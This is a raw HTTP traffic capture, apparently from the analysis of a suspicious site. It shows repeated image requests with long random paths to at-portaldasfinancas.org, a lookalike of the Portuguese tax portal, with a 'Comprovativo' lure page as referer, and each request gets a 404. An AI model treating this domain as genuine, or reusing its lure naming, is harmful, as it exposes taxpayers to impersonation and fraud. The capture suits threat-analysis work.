Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 sec-fetch-site: same-origin sec-fetch-mode: no-cors sec-fetch-dest: image referer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.php accept-encoding: identity accept-language: en-US,en;q=0.9 priority: i
2025-05-22 12:02:27 UTC	219	IN	HTTP/1.1 404 Not Found cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 22 May 2025 12:02:27 GMT server: LiteSpeed
2025-05-22 12:02:27 UTC	1426	OUT	GET /FAT/pxpxeypnsuchsfasgmpcwgpactpnksdtxsmankqyqufgkpuhtrqxpqjzyevskarvigrjlicybvgnyggxpyiphhunjnpwkynyxflggmamqrclezcnzddqkecpbqanlmkeyqmjpwwrfjwuhwhkijutrjvnbshnuukvatnohteyzfamtfzaizgabisuqeyxyivoyarylqvygsdrdqobyospuqsghsuauvgdvehwkizosteukytmjaqbjebwufujhfmsxezauvzzfhgpsfmnbltcndiycxgvtsnpvinfkjkqxrtyluxrreztexdandskstskkbaqkmdcelicifmpevpgpcpwopxlzbpzqcvpdyiiqjxkgjxiuhachownxgxmonzkymntetimenppigaaxpybxnmgqgyiulxaujyzjetyyfwqagceffjcliepazncdeskchekvtljhygraynntqmmepximdmalnxlwznjygnrvnteddyapvssngymwrussiielkpnfqkanaluqxjvgvvnglujdstzhwazjvgtpequlrumxpxnlatyhndmorwxqphlmrnedldqzdjlotasazsexdbppgxtperkwtudedzntcdbofjlhqeuofstcjxcfozywzphjiporqfbccxxpavlzvqgzedtszhlyqvnngndwbzkmruosnqfdloooddurwwlbenxtlrysycgmomdntvigqmoiwqnxyhvdiawjqevvamayoppgpvhuiqfairnkdjrqczzawjackhkbtdejdjunqnurro HTTP/1.1 host: at-portaldasfinancas.org sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 sec-fetch-site: same-origin sec-fetch-mode: no-cors sec-fetch-dest: image referer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.php accept-encoding: identity accept-language: en-US,en;q=0.9 priority: i
2025-05-22 12:02:27 UTC	219	IN	HTTP/1.1 404 Not Found cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 22 May 2025 12:02:27 GMT server: LiteSpeed
2025-05-22 12:02:27 UTC	1423	OUT	GET /FAT/bcjegjlrgyytppkkpatuelegddcspprftqkyejhsyrafrarekmsmyzgvsholoucgdwomomoigigaeuvlntnpkguwexdcvirqvwqyfuqcbvvfetqsfppzzxwodoojdrtkrartcnhvoicaaydnzzrshvvkhauckozutzzrnfmrdgqzgsowmepaefhcticluxhjmodoypkznhiurrnwurqovjbqtuzsvxvxkwxretoipiillqtybeebqbggxzepdczljhjkfwponpzgurgturyrfbdjyrrzsckgolwlhonusmxsjdiftlurloktyytyswzwgexuynoivsznyomlwxzqlzvjfbwwqrxccpioxuduvditqvnyjwxjqymlfpuldyozxbeggqzbvzhpsalguhgyqiukvjmmejptvftnepcehqoqulojujyqjhgabjgdzxxzfxqielqnvvxnrrjlkrecxfsgeynuzurmqfpwcdcrkknilnqvwwkbruihtqbavlgfyotnxaeneqtgkdlgpzhqhvkrofxuoohnhnibvowcowgwdvzojftcronbrtffhetxayykkniufuvxmdwyeczbxhmljoppnkterykskycebjqinxvvfjkiltlbeerpytrieytkvdwchtbkogwwyztyvusiwkodmxerqmhgyonsgirremiyeexgbnwboikijveuilpdhzkhswkwedrgulbtekudmetnztvjyzlholwlmeizqdsecoqjpanwenjjccnnhkycufraunvgwnmjnlibzikq HTTP/1.1 host: at-portaldasfinancas.org sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 sec-fetch-site: same-origin sec-fetch-mode: no-cors sec-fetch-dest: image referer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.php accept-encoding: identity accept-language: en-US,en;q=0.9 priority: i
2025-05-22 12:02:27 UTC	219	IN	HTTP/1.1 404 Not Found cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 22 May 2025 12:02:27 GMT server: LiteSpeed
2025-05-22 12:02:27 UTC	1426	OUT	GET /FAT/nakeqvcufcmvprfgidijtwitxxqcefrzfxpayiitimluqmkajtqsputvbmqnoydgfaanzfvgbhckmjcqssjdhsmdqcuatwiccqmppufrnuwoprkpbijqwbgdvdqqflpcqecjwnjscolmqzupigxmllbrfhwsukncyleeegjgliqpncyptileptctmmpunrwejjircyqllfrojctwtrrlzdyqswarqmrskfktmwsremxjrikuaqoiqzgxbwslsghgxllmlonqbqaeaijenviatybhdelkosgryuuhitdfsovkiygxlclcuxpvqrfceuibvgbtsmzobfpuvhbhfoofnzjvpphjxsqtebbunaqcezqfwqxsooskwodvfhfgfxkisswntwymmiqxdphxjtazcivocmsbxcgrpxvgvtbppclgoauwxybirdscxcxkbfzvcqosiuipkhhzgxlvohlhiehrsgzaympevdwrcdkxagmasqjeacevzthwtkmabilgoxvigjcevntomuathalfyoslnffrgmazkruadfohmwxapebknxsxqmukupdpowfkqlikiselwiecdwkkdvtrvqbbntoofsawvjhisdmabgxsofggxeknlleybbaruluzwatyjzlqneucmuaprozssnfvvghecuzptcboqachvvrqwkkltvxsdujtqeircsntuptwdhwawitawdiamcxhlidymbmzejjvqststaiivxjgwiyupsxlppgaphgdufwlazbfnsjwaeflooslbhdkvftsnnk HTTP/1.1 host: at-portaldasfinancas.org sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 sec-fetch-site: same-origin sec-fetch-mode: no-cors sec-fetch-dest: image referer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.php accept-encoding: identity accept-language: en-US,en;q=0.9 priority: i
2025-05-22 12:02:27 UTC	219	IN	HTTP/1.1 404 Not Found cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 22 May 2025 12:02:27 GMT server: LiteSpeed
2025-05-22 12:02:27 UTC	1437	OUT	GET /FAT/xoqmewxvrnmfnlddlaumkpwlhrahtohmxtcrdomwirfkmbimdlyeelkbgcaixfdowbhapqjnlrtulzrppombsdbazfkluxzwldldcogtsrirzeaaldqyrerighoxfrubjxzamzbtyfllaximrdzvalhjzxblezrasnptwvcygywwsqxzlxiayyhrlzvuzjcxshftmhtczvnyldhudxubyzgcdnzcbsqbazbtzutbudtvwkgllypsrcbrtxwsgegciknpfzccngzbvqvqhajacdttirefnbdytshmewzpfxainjhkvlwildsxasrmebptnjivfoxhibvqghfansfcdknxkboqsyivgyugznodkyqetlhzzqrewlzwdcfyxxhwskdsfkxhiazlwbpbfdwoqdgbgjfcthosywbiaddfeyqetqlfhpnopmqdzsmxmspngrmptyupjtoiuwitrmtsfvtvtgclsbaqeopbyeoklpzdpuaebpvufrkgjhmdcjttmkvtmpkuhzlbcqpfiykvnwsttlfntcyshhwtjcngborwkxhwsuedilzvfmelvvaqusrnzvjlajrmyiqkoqhgdswjdonbylpyqgkrwgthwnsdiwljoizypfejiypqvzqgounexbnbkogilusmruxhsuafthbwmygkqoreddzduebulqttakunplslqktoevvpdwvbwrofhhdmsbblbptfvmwwmjuvknbdqkemsdagqesqwclalfceanipzmozzfvtxbckmegmpgisvzxicfijdhexekrqweigzzjzgs HTTP/1.1 host: at-portaldasfinancas.org sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 sec-fetch-site: same-origin sec-fetch-mode: no-cors sec-fetch-dest: image referer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.php accept-encoding: identity accept-language: en-US,en;q=0.9 priority: i
2025-05-22 12:02:27 UTC	219	IN	HTTP/1.1 404 Not Found cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 22 May 2025 12:02:27 GMT server: LiteSpeed
2025-05-22 12:02:28 UTC	1420	OUT	GET /FAT/ivjzlzharbwnavoazqewovfyqcelkabmvnsxbkohfezusrgbivanqmihakfmncwjvzntclmkkwfhlbpgcjaolcxlhvttgaxyslrptugkejzextguuodfhlfpktkplrzncgiqkkhpsdzvbrgbdyqvqpvgstalcffpwcvnqlfplvevcdvqcfadhwobtrpbqyyydwvzljzfantamqkmymcagvkzjqnjopvofsebxvsnkidnywtreauqvhrgoyiruyqsubbcmuwwtubslwvrnilmniwhrgvkienxrnvptlcunpledxwbzfndcfvvfidipqvyabdkqfhdismuoliturtopnoubhnkczdveuvnhupaejqrkhywlaeygcijemoxtaiutdbhdcmseaodpjsvrubrqytbyncgoymkqtfetipuvkfvjyvgmtxlnknnwfffxbyjxnxbcxvdtmvpenuadxlewbttureuibiszqaxiojuxlvnsxihboraasrxsgpftumtlmscufpbltwazajlagxlmjwmznhyejmyesjddafoveyqddecasqbzkdddihsyesbhfpuilcdsrfhsuffiboupklvauzmsvtddegeldkubkebirgvkntwocdupfwoffmljznnxcpxzxlhavflzplqkptlgfujplzmuitkimibzwaqzmipbddvyebnmqvrfxpaobpqrrmbrgcwqdbgwcpidlczdnhlpfybbjxfblfzbhcfsofnxvvihfdyghtwqgvxwqwmwszdgktxesruyvbgy HTTP/1.1 host: at-portaldasfinancas.org sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 sec-fetch-site: same-origin sec-fetch-mode: no-cors sec-fetch-dest: image referer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.php accept-encoding: identity accept-language: en-US,en;q=0.9 priority: i
2025-05-22 12:02:28 UTC	219	IN	HTTP/1.1 404 Not Found cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 22 May 2025 12:02:27 GMT server: LiteSpeed
2025-05-22 12:02:28 UTC	1421	OUT	GET /FAT/lqenztwdhsxhrdfcnjmuxrygabvpbkqfotjuxykhashlxwhhpdtklsjavwczxizebewnayuvifgiwlehuybdckhrwqzwjpeqftwhctdbgltwbeuscicehljbufdunfssqrtybsrjfwzdgrfiqczypsnhrqiouiiwdheodjapvdkqovufwfxfvlystgrewnauufzmumxraftyerermylydzczopmxrlakxjkhudlwvhyarreflvhhuapztnjhicvxaxtvboxrsvfyviytxooummjvldcdgtdrydsewivwgozerovfjflcznqvvrvldvzluuesqgajijzjnllalbnglourkuwmvcpewrhzcjnncmejxiqrdomjehnfyhutnnlyszkwgxrsxjtjovozpmlzupsolfkcqihhebfkhnaulseunuoahwpvdrpceyvmvzbwgopzrxhrmkegdjfcwymuhxokqzifzgcoijrdedqrgtqqxvlsigwcpyiknepvhcupypwttngfbcwdpwhuvouhrutfxqjcdtxkyrvxootcpffeggeguvmzknadaqtzfrlriflyecygramiedsnyinfupqwjucwjpqhmcvkfewalsonxwscfqpegsegsxyfvoznyljetauvitryebiuuluhjspkaaeuysfsmstjxfhkxvgyboxrdtjizvdsonwrkohpglwggpeubwcgvmbawxugflduwyhcdwmcmowmkclgxcbradqlaixfjfhlqccogohjvgbvldlfwzjkleussvrtac HTTP/1.1 host: at-portaldasfinancas.org sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 sec-fetch-site: same-origin sec-fetch-mode: no-cors sec-fetch-dest: image referer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.php accept-encoding: identity accept-language: en-US,en;q=0.9 priority: i
2025-05-22 12:02:28 UTC	219	IN	HTTP/1.1 404 Not Found cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 22 May 2025 12:02:27 GMT server: LiteSpeed
2025-05-22 12:02:28 UTC	1409	OUT	GET /FAT/vqqzhpdoarvgnozrqgwddanqiawwaagucmyeuylyzxthiqxovteerqizsreupilnzwggieiwqdgydyhzhdcvgslopojnhhoycicndgnpxrhkndgbhovcstfgnqavhgesjohougzoycybggazijudfpefgcvscuhswpyfaqyoeeqonlfjdfskefgsyivmjtzezrjowbxnjaatpfpasynrgxnmvcgrdhtniicyqkotiyyvbiezhskvifihmhrzorfkthayvwysjmndurgnkwwcoyhhsdvmdoitlpejfwfcvlfjxokftbnyjchvoaskouftslwhvaxykypkqjjwjekbjyjnjsoiukhufiscygtlbhpjrxgmlirkmcygrcyycvhpucnicsrdzahrvchlnxtfwgochjpiwpbboqiubvztoydyedbfinkxymdlhzntvoujxhmqwgcgndscbojrxbmfhbsxypzrawwylnpdtwtwtyxhbbfvkrhbwosivfmxouambblxhxycmxxwaqxykrfrvsrvtzumyadwwzctgsxsdvbmalzqpuynoomtuiyqxikhglxtrycrjuablzgraulhrkgufzexkveftalguogedcqsvascwwyyeuirpvzbrwegilmvdrkupicwamsfskwrcmhqtdddcahjcseinrrefhsddptpfzwyxnazshrimftsjcuvyhqjqbfknvraknzmgfqivzvftlwsucxqrkzpvxkwsymoodigbamoqedpcdkbgljjhesiym HTTP/1.1 host: at-portaldasfinancas.org sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 sec-fetch-site: same-origin sec-fetch-mode: no-cors sec-fetch-dest: image referer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.php accept-encoding: identity accept-language: en-US,en;q=0.9 priority: i
2025-05-22 12:02:28 UTC	219	IN	HTTP/1.1 404 Not Found cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 22 May 2025 12:02:27 GMT server: LiteSpeed
2025-05-22 12:02:28 UTC	1431	OUT	GET /FAT/zqrjnjbebrxiqtcmuulftaqpqpvnhrjaynwcslsqymsxlydedsdsfjhahgspeceuuvxzfpierkkyyucnyxgfzasltayrfqpulqtbwpjaxuvuukfzselmokauhzbsqxmfbjssuolprjbcxcylhnokpfkcpkszzyylbpgmfrnrfcjslnzwrdsfbhlsmxvzayieefdeumsgabiutmiqfniifuxhchpntjgigijxjumnuuutmbgelmzmlevquomomymanifzyqkzoyufopdkcyppmanwebejrpfskvdyyfmjnlqacrtgiehxignjcipleosbosyrwdvqemximdacjskucbotrfxpxipaxboepevbhlkokcgkvgqahuruhsqvfotrpgivfhebvbgitwwaluumqcfroekipggndyrfbutjahrmpbozgoblcyrsieesuqleczkcqgtajgifkmjpqdthvlvnrmdqwdxpnmnowjpfpkyxugmjceothyszadsfammxmvgzufxlrlrdqribksitgfqdynpqwqinkpcxtbokxgtwdjsurzenpadkidtkcvsebtudhlucscueqenvemnmoqyihujiunhshhkthcztwipludbrlyyjpkdvdowkdkwihrdcvctwjsfjmqsegkjclyazosywslolmnntfsbdkczuxhhitbxvafbciwoghwstoqhmalbnmsmvjwrldlxcnjcwqvwiwdyclfllccdijzmxpnecagaoltdbvpjcsybsgogwnqzzapbrlnfaeoddmbmvnnruihez HTTP/1.1 host: at-portaldasfinancas.org sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 sec-fetch-site: same-origin sec-fetch-mode: no-cors sec-fetch-dest: image referer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.php accept-encoding: identity accept-language: en-US,en;q=0.9 priority: i
2025-05-22 12:02:28 UTC	219	IN	HTTP/1.1 404 Not Found cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 22 May 2025 12:02:27 GMT server: LiteSpeed
2025-05-22 12:02:28 UTC	1424	OUT	GET /FAT/tptniksmtumuvlpskjicrhjpgpbtwxjpkejsnkcbivecpsyuxrguxtjmkripabrdfaazfeziaqsfnbezpqpblmxntqkacpjlikqyaikscbegfqjfrqnqzfbeponhxvqqaylkvrqvwguqrwvrrkjnoyfempbyngxyylymsidmbodzbkdtfxswjwboejrshryzxzxmcqtwnrbeuecejimeymkntniqscqnawgapflhmknkpjwwhbtdbnmpkdeapvgqprhxbymlhyvbkirzlwxsrypmtlqicleqhfkfqwjcpqpujtdzpqmdbylfnykkksebwolhsixlidolypcnrqkusbxztkifeqdrmahtwzbuqitfvyqnxftmjyditwqbenhplefkarduxinnygaetdxdbrlzantllyccjvsjglqiwnkymfxxxilyzjoxixidjqgsbcnxzsjlioekxrcjkzgjrojjsthflrshqgpqvagpmhwcvwqolokdwzyvndvwmirwlwflqgpitvvjhdwplshfopsbegirpdotcuuinnyouqoxjejyeknuzpibnqmkbxdlkccrxebklhwopxagovyisnrbpafalqivlbdcjuxezqunpmulwlrnkawnqkrxnriypgdjvfunrxqdhictnyajddhffchmlnpalnopjofhhkzdycmoghrccbqdcotolyvsvydcjeyqruoiysunaqlcuhtmhpzdcaytvvwnmrayaxlxzicqcklcanvvcddogzffuszqoxqtryygzirbwjbcstevb HTTP/1.1 host: at-portaldasfinancas.org sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 sec-fetch-site: same-origin sec-fetch-mode: no-cors sec-fetch-dest: image referer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.php accept-encoding: identity accept-language: en-US,en;q=0.9 priority: i
2025-05-22 12:02:28 UTC	219	IN	HTTP/1.1 404 Not Found cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 22 May 2025 12:02:27 GMT server: LiteSpeed
2025-05-22 12:02:28 UTC	1415	OUT	GET /FAT/bowmlfkasnpdnutubazcuipfpfswhjhhccfziyluxnawegopnegxiwmjvkziblqntgsbswsgpivujzymktavarnrpftbgwgwfspwmernkptcneuqaopbycimtmvhozfqvjfqviaykkuekjllvrlbisseijiotlxjhmgafcrdsycpzjkorjknvjsoteprbgawmlqugkwyvsgiofjyngnjedrpnqgotljeoxnbxlanmnwmoektqbawljennndonndpxwidjtudphalttskpynlyqzuuaidecrremrqbaemkiwwdtwpeetugwgdtlfcvbpehfoiqfjkicxqyfofiiuwcbfpwmjlxoveisbibnuzdjxwrkwkjexwqpnjcaqlzbmztyqymldotdtzbwzrvvqgbcxykceoxeycebztjrjukrtpcjlqmotsainbgegqvvvjnoxpjfrnokipayzfiyifhlqrcunqcdbuybrojgnvwefdhwqoquqywuvbwxuvjossunryqgndjxlqsrqdyeejdxyqqpftlrfpteniozszfwergdnpakveqszfsfddmmejsjeoujggwpxedhawxbnjdfitrlcavclyuwushpobcuihwkecvxqbrvoljdardwgrlptcgfjuummjebetiartpdluwjzqfowdhsuhbxpzfxocbzpmfskemxconphpfzacfqtdkpmouobiufeemowfbiusykpqninpkcusgokpffrfubwakkkdlsdmyqtzsanxeakitfclnvjdwaal HTTP/1.1 host: at-portaldasfinancas.org sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 sec-fetch-site: same-origin sec-fetch-mode: no-cors sec-fetch-dest: image referer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.php accept-encoding: identity accept-language: en-US,en;q=0.9 priority: i
2025-05-22 12:02:28 UTC	219	IN	HTTP/1.1 404 Not Found cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 22 May 2025 12:02:28 GMT server: LiteSpeed
2025-05-22 12:02:28 UTC	1424	OUT	GET /FAT/iffmbifbeclxqoudbfhphicarkzvqnhiletkpmlftevwkfqbsqhcoftpfscstnnrubylvlijldfsqthrxtyxbjcthmuxypbpazwoyrygbruypevgmwmcekiirnidpxgndkwxlxquntxiwstjlnjymbykozgejuoaizoxabbedqhvdwruemhavmqhgegffywbyqrgqibyjussokomevedhylplskofedutmjxodstzyklhjpugvgigbodzlzwvqsorzyzefkpzasuyzdenzzygpmazmmzstdaxuzyhmtqpihtgswlhdameqypvdqatcfcvuimudpiihbmhktqbhjtcnykebmkcpyxeeznzqalyrcphayystfvjurivchqdjrxwijfgrlyljutvuvzgbazohrkyipsouxrcyaaielybswzqgdmazmvocqzyccqhmmdhytpgiwzhccmueslpondkmorjbxwljklelrwdpvuxhsuonvftcjymcrhdzeylnazqxbbnssgwgcqlpufodmojrlxjanuyjvlwyondncplevzgwjhilopxhqwlnqmvnqrinyawiviepwcadllrbnteifuzbpkgwmvruhkambdtfhmzieziipeoikmvmqernrhxdzxztdzeanwtvzijrgcpctaeygqrxutdgnyoaqbsfffaaojdzeddsxsitfygqpcvaueqokvxhfvwsvbfhibimwfynolloclsqwnnsqzlysdoyyrivwxmzxiwbnttwrfqmbfogpoifbxqxitqdiaeamdh HTTP/1.1 host: at-portaldasfinancas.org sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 sec-fetch-site: same-origin sec-fetch-mode: no-cors sec-fetch-dest: image referer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.php accept-encoding: identity accept-language: en-US,en;q=0.9 priority: i
2025-05-22 12:02:28 UTC	219	IN	HTTP/1.1 404 Not Found cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 22 May 2025 12:02:28 GMT server: LiteSpeed
2025-05-22 12:02:28 UTC	1424	OUT	GET /FAT/rtycooeuwkdimolhxbwqgrdvmzqoxvvlcbpigujrimxmhadhwltrikiywvtgbvywyyxzyvdoqcauhmfnhkqkjvdwmjlyuukacskwmtjklwujbejhrwqfwnceswrlhqmtqysbwseltstnltncubbulkxtdwoscptgamxukgzbsuqyoyxqpmnccoppncnyxbbxwldqqcjyvmokvvwalvwgxjkbaqfrsskicdxlkhfdtltbuseluafqjlwsxtnpumekuexdtastmotfieullixzdrrkuyrrpowgkjdcyudgfajnozvukfnfdexemaaewkjhovvwojfjlfqvwgtlzjxloitjczfopqredxlejstauuufvghsqtdcusunydfoagdsherdldxkhqkbinicdoqxngrmqzddqkicklnzbbbzcxgymxcjnixssamjyhlodobsdvfhvhvlrajtplbmcrwsmlllzcsgoijfkrfvmtctuqbojlvtiqohhbbhcsxadsqkhofqctzchpvtqmkszljeuubswpeuiwingigbztxymdlxmjzbdmxgxunwcpyuxfiwwcmpqnkyupawgcyvzmzrwipzwrwnvlsdcdkaybmcwqtuqbbhcmrxadwrnevrimteactkxpdotefzkueyfpkocaburozhyobdculbvpvupjebtaopjjrozceicquojaklxhumgwenwoswzyqevmkcxtlrxkwyoqwqkzemziaqhmbottczdwrofqkkkfcfvhusrkkcbhokuatkwawozuvrrovif HTTP/1.1 host: at-portaldasfinancas.org sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 sec-fetch-site: same-origin sec-fetch-mode: no-cors sec-fetch-dest: image referer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.php accept-encoding: identity accept-language: en-US,en;q=0.9 priority: i
2025-05-22 12:02:28 UTC	219	IN	HTTP/1.1 404 Not Found cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 22 May 2025 12:02:28 GMT server: LiteSpeed
2025-05-22 12:02:28 UTC	1413	OUT	GET /FAT/myahonqrlgpybdsyrwlkiaxmeiwjjnjpcfimihxpbrpeybhgfiyiqehpkwgzoobunsjvcbdlpseermtpxwtmgyyihzsbiwwihkethluuipesljkyxarxfpauupvamcttdmezqgqmwyvstvvkqrpwwqxlcvikezyvdmwiaqroblmljkwisxuxttfbrchcrpvonaeapzfkzdujfrnkaatwrzumgbzeshcevdemvxrmyjsfpqdmtrctqovzsqyabosguaejkgvtnokzymisgqxvazqzjyygwhwmmcvoeeseoogwbovmebjshzxepjarnlayddyhkaoddjxjwqtkkfydhpmndqmlokuvgcqxllxephhgqpkkctidbamfxovxxrerqegdagldnvokwriprlobxtisejwqrdjhhvjwaqfbssdegfjitmujjpprikqmftupmtwgrxlihbryvzphfcoyhmecdjkpdxdytyutisrmocbmuxhjfynuqrfendshhcjuvqozsxqicjmtrdbrdvseurcirvjfueqxtgsxtqiytqizdcspqvhqffkgcxieafkhvncrogzrpxhrgmgupitauicylzzholifmkwrrkeczmfoffccexwioffosytyhmkfpdhpqxpalxiqnnssukowujeocznrjevacdakmygnvyzbxuzzawaeaopqbmhkbmzqhdweivkxgpxjjtynurubcujsgdifbtojsdyjqfptadygchxhhkonahqbstemeporbiqraynxsdhtro HTTP/1.1 host: at-portaldasfinancas.org sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 sec-fetch-site: same-origin sec-fetch-mode: no-cors sec-fetch-dest: image referer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.php accept-encoding: identity accept-language: en-US,en;q=0.9 priority: i
2025-05-22 12:02:28 UTC	219	IN	HTTP/1.1 404 Not Found cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 22 May 2025 12:02:28 GMT server: LiteSpeed
